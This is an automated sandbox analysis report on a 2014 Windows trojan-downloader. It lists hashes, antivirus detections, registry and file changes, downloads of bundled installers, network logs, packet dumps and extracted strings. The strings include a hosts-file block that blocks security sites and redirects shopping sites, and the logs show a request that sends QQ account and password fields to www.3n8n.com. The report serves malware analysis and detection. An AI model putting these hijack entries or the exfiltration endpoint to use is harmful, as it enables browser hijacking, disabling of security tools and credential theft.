Analysis Date2014-11-06 23:05:17
MD5854a0059590470d84ccf65260b60c239
SHA1c9911318abd733caa5aa199b14ced3b2e189b09a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1f44003809744f86947a4f669e9a8e3b sha1: d0f1ba9b7d4df800c19b9912a6ae6c8666992b13 size: 229376
Section.rdata md5: c76397807dcdfff0657fbb41a4d1d175 sha1: ddc0ffaa5bec9c46441345c44724ffb8ff26a30e size: 24576
Section.data md5: 7a87fb557538f178b5391e330aa5a7a2 sha1: 179d68a928ecbef1d6a8fb203a0b0d06a8bb7453 size: 299008
Timestamp2014-10-11 08:34:40
PackerMicrosoft Visual C++ v6.0
PEhash1058231a9500d67f7d0ec084ea911acfb7e79b4f
IMPhashaaf71dbf941c274857669d0172085dac
AV360 SafeGen:Variant.Graftor.145274
AVAd-AwareGen:Variant.Graftor.145274
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Trojan.YKCD-1322
AVAvira (antivir)TR/Hijack.557056
AVBullGuardGen:Variant.Graftor.145274
AVCA (E-Trust Ino)Win32/Oflwr.A!crypt
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Graftor.145274
AVEset (nod32)Win32/Agent.WCF
AVFortinetW32/Agent.WCF!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Graftor.145274
AVGrisoft (avg)Agent5.AQG
AVIkarusTrojan.Win32.Agent
AVK7Trojan ( 0049c9161 )
AVKasperskyTrojan-Downloader.Win32.Generic:Trojan.Win32.Hosts2.gen
AVMalwareBytesno_virus
AVMcafeeRDN/Generic.dx!dgm
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Variant.Graftor.145274
AVNormanGen:Variant.Graftor.145274
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.2345.com/?k98792151\\x00
RegistryHKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates FileC:\Program Files\Common Files\bdsd.jpg
Creates FileC:\Program Files\Common Files\appers_7_1958.exe
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Creates FileC:\Program Files\Common Files\gqbb24_mt1.exe
Creates FileC:\Program Files\Common Files\tqrl_97_1957.exe
Creates FileC:\Program Files\Common Files\YoudaoDict_silent3.exe
Creates FileC:\Program Files\Common Files\OfficeAssist.0195.80.1054.exe
Creates FileC:\Program Files\Common Files\shanhu_7654_356.jpg
Creates FileC:\Program Files\Common Files\kt_b_80213.exe
Creates FileC:\Program Files\Common Files\qhse_7654_5943.jpg
Creates FileC:\Program Files\Common Files\setup_t10303.exe
Creates FileC:\Program Files\Common Files\setup_s1020.exe
Creates FileC:\Program Files\Common Files\asdqw_3104-48740.JPG
Creates FileC:\WINDOWS\system32\unrar.dll
Deletes FileC:\Program Files\Common Files\qhse_7654_5943.jpg
Deletes FileC:\Program Files\Common Files\bdsd.jpg
Deletes FileC:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Winsock URLhttp://d3.freep.cn/3tb_140917191931o0a2538987.jpg
Winsock URLhttp://xz.dianxinshu.com/download/setup_s1020.exe
Winsock URLhttp://down.9vh.net/appers_7_1958.exe
Winsock URLhttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Winsock URLhttp://d3.freep.cn/3tb_141007222757xfui539918.jpg
Winsock URLhttp://d3.freep.cn/3tb_140923192942q71f538987.jpg
Winsock URLhttp://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
Winsock URLhttp://down.qunasou.com/kt/kt_b_80213.exe
Winsock URLhttp://wdl1.cache.wps.cn/wps/download/OfficeAssist.0195.80.1054.exe
Winsock URLhttp://guangqu924.oss-cn-hangzhou.aliyuncs.com/gqbb24_mt1.exe
Winsock URLhttp://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
Winsock URLhttp://codown.youdao.com/cidian/YoudaoDict_silent3.exe
Winsock URLhttp://www.3n8n.com/xin8/mail.asp?qqnumber=&qqpassword= 6
Winsock URLhttp://down.tianyunxj.com/tqrl_97_1957.exe

Network Details:

DNSwebmirror.pcbeta.com
Type: A
113.107.42.25
DNSdown.9vh.net
Type: A
222.186.60.3
DNSc06.i06.arnic.hadns.net
Type: A
183.57.148.246
DNSc06.i06.arnic.hadns.net
Type: A
116.11.254.249
DNSguangqu924.oss-cn-hangzhou.aliyuncs.com
Type: A
42.120.230.9
DNS360.band.glb0.ldcache.net
Type: A
183.61.19.169
DNSbgp5.yandui.com
Type: A
60.222.232.216
DNSbgp5.yandui.com
Type: A
222.186.60.10
DNSbgp5.yandui.com
Type: A
222.186.60.11
DNSopt.dl.glb0.lxdns.com
Type: A
70.39.191.87
DNSbgp5.yandui.com
Type: A
222.186.60.11
DNSbgp5.yandui.com
Type: A
60.222.232.216
DNSbgp5.yandui.com
Type: A
222.186.60.10
DNSdownload036.rdb.cnc.ccgslb.com.cn
Type: A
221.204.13.22
DNSdownload036.rdb.cnc.ccgslb.com.cn
Type: A
221.204.13.37
DNSimg.freep.cn
Type: A
221.234.36.167
DNSimg.freep.cn
Type: A
221.234.36.242
DNSdownload.2345.com
Type: A
60.191.223.2
DNSdownload.2345.com
Type: A
60.191.223.4
DNSdownload.2345.com
Type: A
60.191.223.15
DNSdownload.2345.com
Type: A
61.147.127.202
DNSdownload.2345.com
Type: A
61.147.127.203
DNSdownload.2345.com
Type: A
61.160.245.8
DNSdownload.2345.com
Type: A
61.160.245.11
DNSdownload.2345.com
Type: A
61.160.245.14
DNSdownload.2345.com
Type: A
122.228.248.3
DNSdownload.2345.com
Type: A
218.75.155.244
DNSdownload.2345.com
Type: A
60.191.187.15
DNSwww.3n8n.com
Type: A
118.193.155.117
DNScdn.pcbeta.attachment.inimc.com
Type: A
DNSdown.tianyunxj.com
Type: A
DNSdown.xiaoxinrili.com
Type: A
DNSxz.dianxinshu.com
Type: A
DNScodown.youdao.com
Type: A
DNSdown.qunasou.com
Type: A
DNSwdl1.cache.wps.cn
Type: A
DNSd3.freep.cn
Type: A
DNSjifendownload.2345.cn
Type: A
HTTP GEThttp://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
User-Agent:
HTTP GEThttp://down.9vh.net/appers_7_1958.exe
User-Agent:
HTTP GEThttp://down.tianyunxj.com/tqrl_97_1957.exe
User-Agent:
HTTP GEThttp://guangqu924.oss-cn-hangzhou.aliyuncs.com/gqbb24_mt1.exe
User-Agent:
HTTP GEThttp://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
User-Agent:
HTTP GEThttp://xz.dianxinshu.com/download/setup_s1020.exe
User-Agent:
HTTP GEThttp://codown.youdao.com/cidian/YoudaoDict_silent3.exe
User-Agent:
HTTP GEThttp://down.qunasou.com/kt/kt_b_80213.exe
User-Agent:
HTTP GEThttp://wdl1.cache.wps.cn/wps/download/OfficeAssist.0195.80.1054.exe
User-Agent:
HTTP GEThttp://d3.freep.cn/3tb_140923192942q71f538987.jpg
User-Agent:
HTTP GEThttp://d3.freep.cn/3tb_141007222757xfui539918.jpg
User-Agent:
HTTP GEThttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
User-Agent:
HTTP GEThttp://d3.freep.cn/3tb_140917191931o0a2538987.jpg
User-Agent:
HTTP GEThttp://www.3n8n.com/xin8/mail.asp?qqnumber=&qqpassword=%20%206
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP192.168.1.1:1031 ➝ 113.107.42.25:80
Flows TCP192.168.1.1:1032 ➝ 222.186.60.3:80
Flows TCP192.168.1.1:1033 ➝ 183.57.148.246:80
Flows TCP192.168.1.1:1034 ➝ 42.120.230.9:80
Flows TCP192.168.1.1:1035 ➝ 183.61.19.169:80
Flows TCP192.168.1.1:1036 ➝ 60.222.232.216:80
Flows TCP192.168.1.1:1037 ➝ 70.39.191.87:80
Flows TCP192.168.1.1:1038 ➝ 222.186.60.11:80
Flows TCP192.168.1.1:1039 ➝ 221.204.13.22:80
Flows TCP192.168.1.1:1040 ➝ 221.234.36.167:80
Flows TCP192.168.1.1:1041 ➝ 221.234.36.167:80
Flows TCP192.168.1.1:1042 ➝ 60.191.223.2:80
Flows TCP192.168.1.1:1043 ➝ 221.234.36.167:80
Flows TCP192.168.1.1:1044 ➝ 118.193.155.117:80

Raw Pcap
0x00000000 (00000)   47455420 2f646174 612f6174 74616368   GET /data/attach
0x00000010 (00016)   6d656e74 2f666f72 756d2f32 30313430   ment/forum/20140
0x00000020 (00032)   392f3132 2f313733 39333769 6d617639   9/12/173937imav9
0x00000030 (00048)   79766379 636e3361 6b75612e 6a706720   yvcycn3akua.jpg 
0x00000040 (00064)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000050 (00080)   63646e2e 70636265 74612e61 74746163   cdn.pcbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f617070 6572735f 375f3139   GET /appers_7_19
0x00000010 (00016)   35382e65 78652048 5454502f 312e310d   58.exe HTTP/1.1.
0x00000020 (00032)   0a486f73 743a2064 6f776e2e 3976682e   .Host: down.9vh.
0x00000030 (00048)   6e65740d 0a436163 68652d43 6f6e7472   net..Cache-Contr
0x00000040 (00064)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000050 (00080)   63646e2e 70636265 74612e61 74746163   cdn.pcbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f747172 6c5f3937 5f313935   GET /tqrl_97_195
0x00000010 (00016)   372e6578 65204854 54502f31 2e310d0a   7.exe HTTP/1.1..
0x00000020 (00032)   486f7374 3a20646f 776e2e74 69616e79   Host: down.tiany
0x00000030 (00048)   756e786a 2e636f6d 0d0a4361 6368652d   unxj.com..Cache-
0x00000040 (00064)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000050 (00080)   650d0a0d 0a636265 74612e61 74746163   e....cbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f677162 6232345f 6d74312e   GET /gqbb24_mt1.
0x00000010 (00016)   65786520 48545450 2f312e31 0d0a486f   exe HTTP/1.1..Ho
0x00000020 (00032)   73743a20 6775616e 67717539 32342e6f   st: guangqu924.o
0x00000030 (00048)   73732d63 6e2d6861 6e677a68 6f752e61   ss-cn-hangzhou.a
0x00000040 (00064)   6c697975 6e63732e 636f6d0d 0a436163   liyuncs.com..Cac
0x00000050 (00080)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000060 (00096)   61636865 0d0a0d0a 696d632e 636f6d0d   ache....imc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f68657a 692f6a6d 2f736574   GET /hezi/jm/set
0x00000010 (00016)   75705f74 31303330 332e6578 65204854   up_t10303.exe HT
0x00000020 (00032)   54502f31 2e310d0a 486f7374 3a20646f   TP/1.1..Host: do
0x00000030 (00048)   776e2e78 69616f78 696e7269 6c692e63   wn.xiaoxinrili.c
0x00000040 (00064)   6f6d0d0a 43616368 652d436f 6e74726f   om..Cache-Contro
0x00000050 (00080)   6c3a206e 6f2d6361 6368650d 0a0d0a63   l: no-cache....c
0x00000060 (00096)   61636865 0d0a0d0a 696d632e 636f6d0d   ache....imc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642f7365   GET /download/se
0x00000010 (00016)   7475705f 73313032 302e6578 65204854   tup_s1020.exe HT
0x00000020 (00032)   54502f31 2e310d0a 486f7374 3a20787a   TP/1.1..Host: xz
0x00000030 (00048)   2e646961 6e78696e 7368752e 636f6d0d   .dianxinshu.com.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 0a0d0a63   no-cache.......c
0x00000060 (00096)   61636865 0d0a0d0a 696d632e 636f6d0d   ache....imc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f636964 69616e2f 596f7564   GET /cidian/Youd
0x00000010 (00016)   616f4469 63745f73 696c656e 74332e65   aoDict_silent3.e
0x00000020 (00032)   78652048 5454502f 312e310d 0a486f73   xe HTTP/1.1..Hos
0x00000030 (00048)   743a2063 6f646f77 6e2e796f 7564616f   t: codown.youdao
0x00000040 (00064)   2e636f6d 0d0a4361 6368652d 436f6e74   .com..Cache-Cont
0x00000050 (00080)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000060 (00096)   0a636865 0d0a0d0a 696d632e 636f6d0d   .che....imc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f6b742f 6b745f62 5f383032   GET /kt/kt_b_802
0x00000010 (00016)   31332e65 78652048 5454502f 312e310d   13.exe HTTP/1.1.
0x00000020 (00032)   0a486f73 743a2064 6f776e2e 71756e61   .Host: down.quna
0x00000030 (00048)   736f752e 636f6d0d 0a436163 68652d43   sou.com..Cache-C
0x00000040 (00064)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000050 (00080)   0d0a0d0a 206e6f2d 63616368 650d0a0d   .... no-cache...
0x00000060 (00096)   0a636865 0d0a0d0a 696d632e 636f6d0d   .che....imc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f777073 2f646f77 6e6c6f61   GET /wps/downloa
0x00000010 (00016)   642f4f66 66696365 41737369 73742e30   d/OfficeAssist.0
0x00000020 (00032)   3139352e 38302e31 3035342e 65786520   195.80.1054.exe 
0x00000030 (00048)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000040 (00064)   77646c31 2e636163 68652e77 70732e63   wdl1.cache.wps.c
0x00000050 (00080)   6e0d0a43 61636865 2d436f6e 74726f6c   n..Cache-Control
0x00000060 (00096)   3a206e6f 2d636163 68650d0a 0d0a6d0d   : no-cache....m.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 39323331   GET /3tb_1409231
0x00000010 (00016)   39323934 32713731 66353338 3938372e   92942q71f538987.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a486f   jpg HTTP/1.1..Ho
0x00000030 (00048)   73743a20 64332e66 72656570 2e636e0d   st: d3.freep.cn.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 74726f6c   no-cache....trol
0x00000060 (00096)   3a206e6f 2d636163 68650d0a 0d0a6d0d   : no-cache....m.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f337462 5f313431 30303732   GET /3tb_1410072
0x00000010 (00016)   32323735 37786675 69353339 3931382e   22757xfui539918.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a486f   jpg HTTP/1.1..Ho
0x00000030 (00048)   73743a20 64332e66 72656570 2e636e0d   st: d3.freep.cn.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 74726f6c   no-cache....trol
0x00000060 (00096)   3a206e6f 2d636163 68650d0a 0d0a6d0d   : no-cache....m.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 62616964 75383838 3838385f   p3_kbaidu888888_
0x00000020 (00032)   6a673034 4f756e6c 46343833 6c5a6174   jg04OunlF483lZat
0x00000030 (00048)   6d364972 355f7631 342e372e 312e6578   m6Ir5_v14.7.1.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 486f7374   e HTTP/1.1..Host
0x00000050 (00080)   3a206a69 66656e64 6f776e6c 6f61642e   : jifendownload.
0x00000060 (00096)   32333435 2e636e0d 0a436163 68652d43   2345.cn..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a 61636865 20052002            ....ache . .

0x00000000 (00000)   47455420 2f337462 5f313430 39313731   GET /3tb_1409171
0x00000010 (00016)   39313933 316f3061 32353338 3938372e   91931o0a2538987.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a486f   jpg HTTP/1.1..Ho
0x00000030 (00048)   73743a20 64332e66 72656570 2e636e0d   st: d3.freep.cn.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 6f61642e   no-cache....oad.
0x00000060 (00096)   32333435 2e636e0d 0a436163 68652d43   2345.cn..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a 61636865 20052002            ....ache . .

0x00000000 (00000)   47455420 2f78696e 382f6d61 696c2e61   GET /xin8/mail.a
0x00000010 (00016)   73703f71 716e756d 6265723d 26717170   sp?qqnumber=&qqp
0x00000020 (00032)   61737377 6f72643d 25323025 32303620   assword=%20%206 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000050 (00080)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000060 (00096)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000070 (00112)   204e5420 352e313b 20535631 290d0a48    NT 5.1; SV1)..H
0x00000080 (00128)   6f73743a 20777777 2e336e38 6e2e636f   ost: www.3n8n.co
0x00000090 (00144)   6d0d0a43 61636865 2d436f6e 74726f6c   m..Cache-Control
0x000000a0 (00160)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....


Strings
\
 \
.00-+ -E-0-0
00...........?-  
0
0 
0
01A0__
.
\
M
:
.
x
.
&KY
-
-000
-+
01
\
CC
.
 
u
Cjjj
Fjjj
         (((((                  H
(null)
^,_^][
                          
?*<>|"
),(((((),(((
\....\
00:00:00
0 0,000P0T0d0
0 0&0,02080>0D0J0P0V0\0b0h0n0t0z0
0$0+010:0G0S0g0m0
0"0.0E0]0y0
(0-0M0R0
0_1~0n1
0123456789abcdef
"@0123456789ABCDEF
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
%02.2d
%02d/%02d/%04d %02d:%02d:%02d.%03d 
%02u-%02u-%02u %02u:%02u
%02u-%02u-%u %02u:%02u
%070K0_0
 (08@P`p
0969<9B9H9N9T9Z9`9f9l9r9z9
0A@@Ju
>0H0B0L061=1_1f1r3|3v3
0J1t1~1
0M0s041<1
!0S0b0{0
0SSSSS
0WWWWW
0_^[Y]
;1;?;{;
101A1F1^1g1w1
1 1$1(1,1014181<1
111x1*2
1%1B1U1^1
126126126126
127.0.0.1   360.cn
127.0.0.1   bbs.360.cn
127.0.0.1   bbs.duba.net
127.0.0.1   bbs.ikaka.com
127.0.0.1   bbs.janmeng.com
127.0.0.1   bbs.kafan.cn
127.0.0.1   bbs.sanfans.com
127.0.0.1   bbs.sd.keniu.com
127.0.0.1   bbs.shadu007.com
127.0.0.1   bbs.taobao.com
127.0.0.1   bbs.vc52.cn
127.0.0.1   cd001.www.duba.net
127.0.0.1   club.alimama.com
127.0.0.1   forum.taobao.com
127.0.0.1   lt.ijinshan.com
127.0.0.1   taoke.alimama.com
127.0.0.1   www.360.cn
127.0.0.1   www.alimama.com
127.0.0.1   www.ijinshan.com
127.0.0.1   www.kafan.cn
127.0.0.1   www.kpfans.com
127.0.0.1   www.shadu007.coC:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1   www.shadu007.com
127.0.0.1   www.virscan.org
141@1`1d1
18141X1\1h1l1p1|1
18273I3
1c8g8k8o8s8w8{8
<*>1>j>q>
1q2	2C2
1#QNAN
1#SNAN
219.235.1.101   517xky.webnode.cn
219.235.1.101   bijibendiannao.blog.china.com
219.235.1.101   cpro.baidu.com
219.235.1.101   diannao.nav123.com
219.235.1.101   mall.yi85.com
219.235.1.101   shouji.tbw.net.cn
219.235.1.101   tbwwsgwdn.tao132.cn
219.235.1.101   www.66taoke.com
219.235.1.101   www.77taoba.com
219.235.1.101   www.91kd.cn
219.235.1.101   www.949528.cn
219.235.1.101   www.cntorg.com
219.235.1.101   www.haixitaoke.com
219.235.1.101   www.hl-sms.cn
219.235.1.101   www.lizhishu.com
219.235.1.101   www.mbaobao.com
219.235.1.101   www.mbbw.info
219.235.1.101   www.mvptaoke.com
219.235.1.101   www.nongyecn.com
219.235.1.101   www.pg8.cn
219.235.1.101   www.qiangdiannao.cn
219.235.1.101   www.shopnokia.info
219.235.1.101   www.sjxun.com
219.235.1.101   www.sugouwu.com
219.235.1.101   www.taobao.com
219.235.1.101   www.taobao-mo.com
219.235.1.101   www.taobao-shouji.com
219.235.1.101   www.taok.cc
219.235.1.101   www.taoke.info
219.235.1.101   www.taoke.la
219.235.1.101   www.taokw.com
219.235.1.101   www.ttcome.cn
219.235.1.101   www.ywaili.com
2$2<2T2X2h2x2
2,252;2n2
2(252;2O2
2$2T2x2l3p3t3x3
2 3-3d3
 2345zhen
23r,3r
23r,3z
23z,3r,3z
?"?&?*?.?2?6?:?>?B?F?J?N?R?V?Z?^?b?f?j?n?r?v?z?~?
282<2\2`2
%2\CLSID
%2\DocObject
%2\Insertable
2n1r1v1z1~1
%2\protocol\StdFileEditing\server
%2\protocol\StdFileEditing\verb\0
323r(3r 
3:323z(3r(3z 3r 
3:323z83r8
3"3?3G3S3Y3d3p3
3$3(3H3L3l3p3
3 3@3L3X3d3x3
3:3j 3z(3z 
3:3z(3z 
   360SE
3c5W7J7S7]7f7j7w7
3F3F6767673E237E287E3E737F7D3F68797E283F7D71797C3E7163602F61617E657D7275622D8DD8900FB786464602A
3j03z03j
3j03z03j(3z(
3j<3z<
3j,3z,3j$3z$
3j43z43j
3j43z43j,3z,
3j83:3z8
3r03r(
3r<3r$3r
3r<3r4
3z03r03z
3z03r83r0
:3z,3j
3z<3r<
3z(3r03r(
3z$3r,3r$
3z,3r,3z$3r$
3z<3r<3z$3r$3z
3z<3r<3z43r4
3z,3r43r,
3z,3z$
3z<3z$3z
3z<3z4
3z43r<3r4
3z43r43z
3z43r43z,3r,
3z43z,
3z8323r8
3z83r83z03r0
3z83r83z 3r 3z
3z83z0
3z83z 3z
40L0g0
4$434C4Q4a4p4
444$4D4d4p4|4
4 4)494
4,484<4\4`4d4
4(5H5T5`5l5x5
465p5X7
.4.7.lnk
4\<`<d<h<l<p<t<
4~f9.u
4H4O4n4v4
\$4UVW
50o0y0
5(54585H5h5t5
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5x5|5
5,;\<`<d<h<l<p<t<x<|<
5P6j6/?
647X7`7h7
6;58nH
6!6(6/6N6U6\6c6
6,686<6\6`6
6,6L6d6h6
6 7,777D7m7y7
6"7-7Q7]7h7
=6=@=:=D=
6H7\7~7
6k>o>s>w>{>
6Q617]7
7$:(:,:
70c2441db366d92ea7be1342b3bf629026ba92bb675f06e684bdd34511097434
_7654_356.exe
_7654_5943.exe
77>7E7L7S7Z7a7
7(7,7P7`7p7@7
7 7H7X7h7x7
7/7S7\7#818;9X9
788]8.9|9
7)8j<A=X=u=
7'8V8`8Z8d8
7c8L8U8
7K8\8j8
>	>">.>8> ?
808<8X9`9x9,<L<X<x<
818<8C8J8Q8X8_8f8
8(>->3>8>Y>w>
858@8V8
8"8(8.848:8@8F8L8R8X8^8d8j8p8v8|8
8<8H8L8l8|8
8(>H>L>l>p>
?$?(?8?X?d?@0`0
92:T:e:$:
959@9y9
%9, %8
98:T:\:d:u:
9,9B9X9n9<8_8
9,9K9[9h9
9`:i:r:~:
="=9=J=
9J:n:t:z:
9t$dt7
a538f494a2afdb0ca5c008d34100dc71cb684672c0c511da8d95d38642fc2360
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
%A, %B %d, %Y
abnormal program termination
Abnormal program termination
AdjustTokenPrivileges
AdjustWindowRectEx
ADSafe3.lnk
advapi32.dll
Advapi32.dll
ADVAPI32.dll
ADVAPI32.DLL
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
   Aguangshushurufazhen
An application has made an attempt to load the C runtime library incorrectly.
An exception (%08X) occurred during DllEntryPoint or DllMain in module:
AppendMenuA
Archive
Archive *
Arg list too big
Array<char>
Array<char> *
Array<int>
Array<int> *
Array<__int64>
Array<__int64> *
Array<UnpackFilter *>
Array<UnpackFilter *> *
Array<unsigned char>
Array<unsigned char> *
Array<VM_PreparedCommand>
Array<VM_PreparedCommand> *
Array<wchar_t>
Array<wchar_t> *
AsDefault=0
AsDefault=1
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="2345.com" type="win32"></assemblyIdentity><description>2345.com</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS></application></compatibility></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGP